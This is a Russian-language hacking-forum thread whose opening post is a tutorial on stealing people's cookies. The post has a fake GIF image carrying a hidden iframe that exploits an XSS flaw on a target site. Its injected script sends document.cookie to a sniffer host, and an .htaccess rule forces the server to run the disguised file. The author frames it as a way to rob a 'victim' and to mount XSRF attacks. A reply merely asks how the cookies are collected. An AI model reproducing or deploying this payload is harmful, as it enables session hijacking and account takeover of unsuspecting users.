Работаете через Tor? Используйте нашу onion-версию сайта: forum.h4ckorsoftgfvvng.onion
Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Трафик, загрузки > Уязвимости сайтов и движков
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Ответ
 
Опции темы
Старый 25.02.2011, 09:17   #1
narviss
user 
 
Аватар для narviss
 
Регистрация: 26.12.2010
Сообщений: 64
Вес репутации: 2 narviss новичек
Депозит: 0$
Вы сказали Спасибо: 15
Поблагодарили 21 раз(а) в 14 сообщениях
Вступление


Итак, хочу описать способ взлома, который использую я)
Для этого показываю жертве картинку http://host.com/prikol.gif , либо http://host.com/scrin_15.jpg . Жертва просматривает эту картинка, а я в этот момент ворую куки, или используя xsrf-атаку творю плохие вещи!Можно использовать это для разных целей...

Меньше слов - больше дела!


Итак, начнём!Откроем блокнот и напишем любой код, может это быть тот же ifrаmе ,или что либо другое, например впишем iframe для кражи куки -
Код HTML:
<ifrаmе src='http://site.com/index.php?id=1"><script> img = new Image(); img.src = "http://sniffer.ru/s.gif?"+document.cookie; </script>' style='display:none'></ifrаmе>
site.com - это сайт, на котором уязвимость вида xss , sniffer.ru сайт, на котором находится сниффер. Подробнее о xss в этой статье.

Теперь обязательно добавим в самом вверху кода картинку, вот -
Код HTML:
<img src="http://адрес к картинке/">
Из этого всего должно получится такое вот безобразие -
Код HTML:
<img src="http://адрес к картинке/">
<ifrаmе src='http://site.com/index.php?id=1"><script> img = new Image(); img.src = "http://sniffer.ru/s.gif?"+document.cookie; </script>' style='display:none'></ifrаmе>
Сохраним этот файл с расширением .gif , и обзавём его например prikol=)
Теперь создадим ещё один файл, впишем туда -
Цитата:
<Files "prikol.gif">
AddType application/x-httpd-php .gif
</Files>
prikol.gif - заменяем на название нашему файла, расширение не меняем.

Сохраним его как .htaccess

Итак, теперь создадим сайт. Подключимся к сайту через любой фтп менеджер.
Зальём на сайт наш файл prikol.gif и .htaccess, заходим на страницу http://ваш_сайт.ru/prikol.gif и должен выполнится наш код.Теперь кидаем эту ссылку жертве!

========================================

С вами был Narviss!

Спасибо за помощь Великому Интернету)))
narviss вне форума   Ответить с цитированием
Старый 19.05.2012, 22:03   #2
Mandar1nLom
newbie 
 
Регистрация: 19.05.2012
Сообщений: 1
Вес репутации: 0 Mandar1nLom новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Narviss, Спасибо, конечно, за статью, но не мог бы ты объяснит, как именно работает этот способ? А именно, куда приходят куки "жертвы"? Или может я что-то не так понял, тогда прошу прощения, поскольку я не программист
Mandar1nLom вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 09:39.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru